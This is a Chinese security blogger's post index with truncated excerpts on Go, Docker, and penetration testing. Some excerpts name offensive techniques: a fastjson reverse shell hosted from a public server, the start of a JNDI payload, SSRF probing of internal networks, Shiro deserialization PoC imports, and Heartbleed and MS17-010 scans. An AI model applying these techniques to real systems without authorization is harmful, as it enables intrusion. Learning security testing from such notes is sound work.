Mysticbinary

只有通过概念的劳作才能获得真实的思想

2020年7月17日 #

企业安全_借助安全厂商的产品发现企业安全问题

摘要: 在甲方企业作安全建设,除了要通过内部的力量发现安全问题,也要通过外部的力量,比如通过租凭、购买安全厂商的设备、服务,来发现企业存在的安全问题。这里只是列举一些常见的(我用过的),和我遇到的安全场景,不是很全面。 主机安全: 青藤云 安骑士 防火墙: 天融信 WAF: 绿盟 安全狗 CDN: 知道创宇 阅读全文

posted @ 2020-07-17 17:53 Mysticbinary 阅读(226) 评论(1) 推荐(0) 编辑

2020年7月16日 #

go mod管理 init 和 包导入的关系

摘要: 你创建了一个文件的名字为:lisi001 如果你初始化项目名字为lisi, go mod init lisi 那么你导包的时候就得也用lisi import ( "lisi/path" "lisi/tools" ) 总结:一切以mod的为主,不要用创建文件的名字lisi001,要用lisi. 阅读全文

posted @ 2020-07-16 17:14 Mysticbinary 阅读(1127) 评论(0) 推荐(0) 编辑

2020年7月7日 #

利用对外的代理端口进行内网探测 SSRF

摘要: 检测 看到一个主机或者web站点有一些奇怪的端口,都可以尝试一下以下的方法,看看有没有对外的代理端口。 假设你看到类似这种:x.211.x.192:20358 这种ip和端口,那么可以用DNSLog测试一下 测通了之后,直接替换成内网url、地址就行了。 我直接直接访问一个外网的url,有时候这种端 阅读全文

posted @ 2020-07-07 14:00 Mysticbinary 阅读(10) 评论(0) 推荐(0) 编辑

2020年6月12日 #

go 报 need type assertion

摘要: responese_total := m["responses"].([]interface{})[0].(map[string]interface{})["hits"].(map[string]interface{})["total"] value, ok := responese_total.( 阅读全文

posted @ 2020-06-12 14:07 Mysticbinary 阅读(180) 评论(0) 推荐(0) 编辑

2020年6月11日 #

go mod包管理 加代理下载

摘要: 原始go.mod文件 module xxx go 1.14 报错 i/o timeout go mod init workorder go mod init: go.mod already exists go mod tidy go: finding module for package githu 阅读全文

posted @ 2020-06-11 18:04 Mysticbinary 阅读(664) 评论(0) 推荐(0) 编辑

go 报错 import cycle not allowed

摘要: 运行时报错,import cycle not allowed ; 查了goole大概知道了原因,还是导包类的问题,我检察了一下我的代码库,发现我昨天划分几个工具文件,里面的两个文件相互引用,就导致报import cycle not allowed 错了,这个错误在别的语言上都不会报,基于以前的使用习 阅读全文

posted @ 2020-06-11 12:06 Mysticbinary 阅读(851) 评论(0) 推荐(0) 编辑

2020年6月1日 #

go http库 设置代理

摘要: func ProxyTest() { proxyAddr := "http://your IP:8080/" httpUrl := "http://your target url" poststr := "your post values" proxy, err := url.Parse(proxy 阅读全文

posted @ 2020-06-01 18:54 Mysticbinary 阅读(358) 评论(0) 推荐(0) 编辑

2020年5月28日 #

sentry SSRF

摘要: Sentry介绍 Sentry 是一个实时的事件日志和聚合平台,基于 Django 构建。一般在url上、或者logo上看到有sentry都可以用它的exp试试,原理是由于sentry默认开启source code scrapping ,导致可以从外部进行blind ssrf请求。 exp测试步骤 阅读全文

posted @ 2020-05-28 11:21 Mysticbinary 阅读(877) 评论(7) 推荐(1) 编辑

2020年5月22日 #

心脏滴血(CVE-2014-0160)检测与防御

摘要: 用Nmap检测 nmap -sV --script=ssl-heartbleed [your ip] -p 443 有心脏滴血漏洞的报告: ➜ ~ nmap -sV --script=ssl-heartbleed 111.X.X.53 -p 443 Starting Nmap 7.80 ( http 阅读全文

posted @ 2020-05-22 12:15 Mysticbinary 阅读(721) 评论(0) 推荐(0) 编辑

2020年5月13日 #

tcpdump后台抓包并输出给wireshark

摘要: # 先进到/tmp 目录执行,方便Filezila 传输 # 开启抓包 nohup tcpdump -i eth0 -s0 -nnA 'port 22' -w dump22.pcap & [1] 15022 # 查询pid ps -ef|grep tcpdump |grep -v 'grep' # 阅读全文

posted @ 2020-05-13 18:31 Mysticbinary 阅读(843) 评论(0) 推荐(0) 编辑

2020年5月10日 #

企业安全_检测SQL注入的一些方式探讨

摘要: 寻找SQL注入点的 way 在企业中有如下几种方式可以选择; 自动化 - 白盒基于源码卡点审计 - 黑盒基于流量进行自动化扫描 手动 - 手动白盒看代码 - 手动黑盒检查 MySQL Inject 入门案例 没有做任何过滤,直接把参数插入到SQL语句中,就是注入点; PHP Demo: // 接收来 阅读全文

posted @ 2020-05-10 23:23 Mysticbinary 阅读(322) 评论(0) 推荐(0) 编辑

MySQL注入时常用函数

摘要: 注入常用函数 数据库相关 database() 返回当前数据库名 @@datadir 读取数据库路径 @@basedir 读取数据库安全路径 @@version_compile_os 返回当前操作系统 UDF相关 version() || @@version 返回MySQL服务器的版本 show v 阅读全文

posted @ 2020-05-10 23:05 Mysticbinary 阅读(335) 评论(0) 推荐(0) 编辑

mysql添加远程连接权限

摘要: 查看登录用户 mysql> select host,user,password from user; 想用本地IP登录,那么可以将以上的Host值改为自己的Ip即可。 这里有多个root,对应着不同场景。(后期研究为什么mysql表有多个root) 给远程连接授权 mysql> use mysql; 阅读全文

posted @ 2020-05-10 23:04 Mysticbinary 阅读(224) 评论(0) 推荐(0) 编辑

2020年5月8日 #

nc替代ping

摘要: linux nc介绍: 替代ping 有时候想看两台机器的网络通不通,除了ping,还可以用nc 主机1 设置监听: 主机2 设置访问: 参考 https://blog.csdn.net/michael493439861/article/details/7445454 阅读全文

posted @ 2020-05-08 18:37 Mysticbinary 阅读(260) 评论(0) 推荐(0) 编辑

kali 将家目录下的中文文件名修改成英文

摘要: 修改vim ~/.config/user-dirs.dirs 打开`文件,删除那些中文目录 在目录下创建英文目录 重启 参考 https://elementaryos.stackexchange.com/questions/9962/how-to-set-user-dirs-config-user- 阅读全文

posted @ 2020-05-08 18:15 Mysticbinary 阅读(498) 评论(0) 推荐(0) 编辑

2020年5月5日 #

Shiro反序列化漏洞检测、dnslog

摘要: 信息收集 poc # pip install pycrypto import sys import base64 import uuid from random import Random import subprocess from Crypto.Cipher import AES def enc 阅读全文

posted @ 2020-05-05 16:10 Mysticbinary 阅读(863) 评论(0) 推荐(0) 编辑

macOS命令行切换Python版本

摘要: brew安装anaconda3 brew cask install anaconda3 安装之后打开路径查看:/usr/local/anaconda3/bin anaconda3环境变量设置 vim ~/.zshrc export PATH=/usr/local/anaconda3/bin:$PAT 阅读全文

posted @ 2020-05-05 09:54 Mysticbinary 阅读(618) 评论(0) 推荐(0) 编辑

2020年5月3日 #

Win命令行切换Python版本

摘要: 安装2.x 和 3.x 的python 我这里使用anaconda来安装两个版本的python包。 conda create --name python2 python=2.7 conda create --name python23 python=2.7 安装完之后,在你的anaconda程序目录 阅读全文

posted @ 2020-05-03 15:17 Mysticbinary 阅读(479) 评论(0) 推荐(0) 编辑

2020年4月29日 #

msfconsole 常用命令记录

摘要: Metasploit是一款开源的渗透测试框架,它现在还在逐步发展中,下面介绍的一些功能和命令,可能会在未来失效。 Metasploit框架提供了多种不同方式的使用接口: msfgui msfconsole(本文只介绍这种接口) msfcil msfweb msfconsole命令 进入Metaspl 阅读全文

posted @ 2020-04-29 10:34 Mysticbinary 阅读(498) 评论(0) 推荐(0) 编辑

2020年4月27日 #

linux 几种传输文件的方式

摘要: SimpleHTTPServer + wget 如果线上可以直连线下的话,在线上使用wget访问线下的文件服务器; web的方法,比较灵活,使用完要尽快关闭这个服务; cd temp temp$ python -m SimpleHTTPServer 8090 # 看一下python版本,python 阅读全文

posted @ 2020-04-27 19:27 Mysticbinary 阅读(424) 评论(2) 推荐(0) 编辑

fastjson 反弹shell

摘要: 如下文章说得很不详细,只是用于记录我的步骤,初次利用的人,建议找别的博客文章学习。 准备一台公网服务器 cd test python -m SimpleHTTPServer 8888 javac Exploit.java 里面的ip和端口改成你的 import javax.naming.Contex 阅读全文

posted @ 2020-04-27 17:06 Mysticbinary 阅读(2174) 评论(0) 推荐(1) 编辑

2020年4月26日 #

Docker安装Openvas

摘要: 安装 ➜ ~ docker search openvas NAME DESCRIPTION STARS OFFICIAL AUTOMATED mikesplain/openvas A docker container for OpenVAS 152 ...... ➜ ~ docker pull mi 阅读全文

posted @ 2020-04-26 14:07 Mysticbinary 阅读(784) 评论(2) 推荐(0) 编辑

Win10安装Docker

摘要: 家庭版先安装Hyper-V 将如下代码添加到记事本中,并另存为Hyper-V.cmd文件。代码如下: pushd "%~dp0" dir /b %SystemRoot%\servicing\Packages\*Hyper-V*.mum >hyper-v.txt for /f %%i in ('fin 阅读全文

posted @ 2020-04-26 10:48 Mysticbinary 阅读(203) 评论(0) 推荐(0) 编辑

2020年4月25日 #

BurpSuite生成快捷方式

摘要: Win下 在win系统写个脚本,能方便快捷的打开burp。 burp.bat @echo oFF if "%1" neq "1" ( >"%temp%\tmp.vbs" echo set WshShell = WScript.CreateObject^(^"WScript.Shell^"^) >>" 阅读全文

posted @ 2020-04-25 19:23 Mysticbinary 阅读(1069) 评论(0) 推荐(0) 编辑

2020年4月24日 #

Docker 一次性进程与对话进程

摘要: Docker在运行程序的时候,需要区分运行的程序是一次性进程还是对话进程,不同的进程操作方式有差异。 一次性进程 一些简单进程是不需要交互的,比如hello-world,运行完就结束了。 ➜ ~ docker container run hello-world 对话进程 很多场景下的进程是需要交互的 阅读全文

posted @ 2020-04-24 20:23 Mysticbinary 阅读(225) 评论(0) 推荐(0) 编辑

Docker HelloWorld

摘要: hello world入门 ➜ ~ docker --help images List images ...... ➜ ~ docker images REPOSITORY TAG IMAGE ID CREATED SIZE # 为空 ➜ ~ docker search hello NAME DES 阅读全文

posted @ 2020-04-24 20:06 Mysticbinary 阅读(135) 评论(0) 推荐(0) 编辑

网络信息收集

摘要: 内网扫描 TCP方式扫描一个C段下的存活主机 nmap -sn -PE -T4 192.168.0.0/24 速度更快的方式 sudo nmap -sP --min-hostgroup 1024 --min-parallelism 1024 -iL ip_input.txt -oN ip_outpu 阅读全文

posted @ 2020-04-24 18:09 Mysticbinary 阅读(681) 评论(0) 推荐(0) 编辑

永恒之蓝(MS17-010)检测与利用

摘要: 利用Nmap检测 命令: nmap -p445 --script smb-vuln-ms17-010 [IP] # 如果运行报错,可以加个sudo IP/24 = 8位地址范围,对应的子网掩码简单理解: ip/24 11111111 11111111 11111111 00000000 2^8=25 阅读全文

posted @ 2020-04-24 14:10 Mysticbinary 阅读(865) 评论(0) 推荐(0) 编辑

2020年4月21日 #

Wireshark的两种过滤器与BPF过滤规则

摘要: Wirshark使用的关键就在于过滤出想要的数据包,下面介绍怎么过滤。 抓包过滤器 Wirshark有两种过滤器,一个是抓包过滤器,一个是显示过滤器,他们之间的区别在于抓包过滤器只抓取你设置的规则,同时丢弃其他信息,显示过滤器并不会丢弃信息,只是将不符合规则的数据隐藏起来而已。有时候一旦数据包被丢弃 阅读全文

posted @ 2020-04-21 16:25 Mysticbinary 阅读(771) 评论(2) 推荐(5) 编辑

2020年4月20日 #

Wireshark使用记录

摘要: TCP/IP协议族里的协议众多 要一一精通比较困难,在一些紧急急需要分析主机、客户端的流量场景时,不懂协议也要上!下面就是用到哪里就记录到哪,有错误欢迎评论指出,多谢。 wireshark这玩意相当于电脑的总网络代理,不像burpsuite只有只能拦截浏览器的http/https两种协议,电脑上使用 阅读全文

posted @ 2020-04-20 20:06 Mysticbinary 阅读(305) 评论(0) 推荐(1) 编辑

2020年4月17日 #

过滤搜索引擎的抓取数据

摘要: 一些规定 搜索引擎不区分大小写; Google限制最多搜索32个单词,包含搜索项和高级运算符。不过也有一些其他方法绕过这种限制,比如使用通配符来代替某些搜索项。 同样的搜索语法,百度有时也会得到惊喜。 基础型查询 inurl 搜索包含有特定字符的URL。例如输入inurl:/admin_login, 阅读全文

posted @ 2020-04-17 16:16 Mysticbinary 阅读(799) 评论(0) 推荐(3) 编辑

WEB容器开启、关闭OPTIONS方法

摘要: 发现 请求包随意,响应包信息如下: 特征: 关闭options方案 关闭options得根据服务器使用的WEB容器种类来决定方法,下面列举主流的。 ngixn 参考: https://blog.csdn.net/doIt999/article/details/51160871 tomcat 参考: 阅读全文

posted @ 2020-04-17 11:50 Mysticbinary 阅读(1913) 评论(0) 推荐(0) 编辑

2020年4月16日 #

企业安全_监控Github关键字

摘要: Hawkeye github: https://github.com/0xbug/Hawkeye 教程: https://my.oschina.net/adailinux/blog/1609221 GSIL https://github.com/FeeiCN/GSIL/blob/master/REA 阅读全文

posted @ 2020-04-16 12:02 Mysticbinary 阅读(228) 评论(0) 推荐(0) 编辑

2020年4月15日 #

fastjson 请求dnslog

摘要: Fastjson ⇐ 1.2.47 远程命令执行漏洞利用工具及方法记录 payload rmi://、ldap:// 可以切换尝试。 param={ "@type": "java.lang.Class", br / > "a": { "@type": "java.lang.Class", "val" 阅读全文

posted @ 2020-04-15 15:01 Mysticbinary 阅读(1245) 评论(0) 推荐(1) 编辑

网络地址转换NAT的两种模式(概念浅析)& IP溯源

摘要: 由于全球IPv4地址越来越少、越来越贵,因此大到一个组织,小到一个家庭一个人都很难获得公网IP地址,所以只能使用内网地址,从而和别人共享一个公网IP地址。在这种情况下,NAT技术诞生。 翻译 NAT(Network Address Translation:网络地址转换)是将IP 数据包头中的IP 地 阅读全文

posted @ 2020-04-15 10:21 Mysticbinary 阅读(901) 评论(0) 推荐(0) 编辑

2020年4月13日 #

springboot actuator 配置安全

摘要: springboot actuator监控是什么?类似php的phpinfor()函数,不过actuator更强大,可以查看的数据、状态更多。Actuator是Spring Boot提供的对应用系统的监控和管理的集成功能,可以查看应用配置的详细信息,例如自动化配置信息、创建的Spring beans 阅读全文

posted @ 2020-04-13 10:21 Mysticbinary 阅读(3122) 评论(0) 推荐(0) 编辑

2020年4月10日 #

HTTP头Content-Type类型记录

摘要: 默认发POST格式 Content Type: application/x www form urlencoded 发JSON格式 Content Type: application/json; charset=utf 8 阅读全文

posted @ 2020-04-10 18:18 Mysticbinary 阅读(197) 评论(0) 推荐(0) 编辑

2020年4月9日 #

XXE漏洞原理

摘要: XXE与XML注入的区别 https://www.cnblogs.com/websecurity-study/p/11348913.html XXE又分为内部实体和外部实体。我简单区分为内部实体就是自己构造一个功能体,外部实体就是可以引入外部文件。 原理 服务器加载外部实体声明<!ENTITY 实体 阅读全文

posted @ 2020-04-09 18:10 Mysticbinary 阅读(419) 评论(0) 推荐(0) 编辑

XXE检测与利用

摘要: XXE = XML External Entity 特征 特征1 .ashx 看到url是 .ashx后缀的 特征2 响应体是xml 发现有这些特征都可以用下面的流程测试 测试 在线工具: http://ceye.io/ http://www.dnslog.cn/ https://dnslog.io 阅读全文

posted @ 2020-04-09 18:00 Mysticbinary 阅读(597) 评论(0) 推荐(0) 编辑

2020年4月8日 #

brew安装MySQL V5.7

摘要: 安装 brew install mysql@5.7 // 安装 brew link --force mysql@5.7 // 链接 brew services start mysql@5.7 // 启动服务 brew services stop mysql@5.7 //停止 brew service 阅读全文

posted @ 2020-04-08 20:03 Mysticbinary 阅读(3014) 评论(0) 推荐(0) 编辑

导航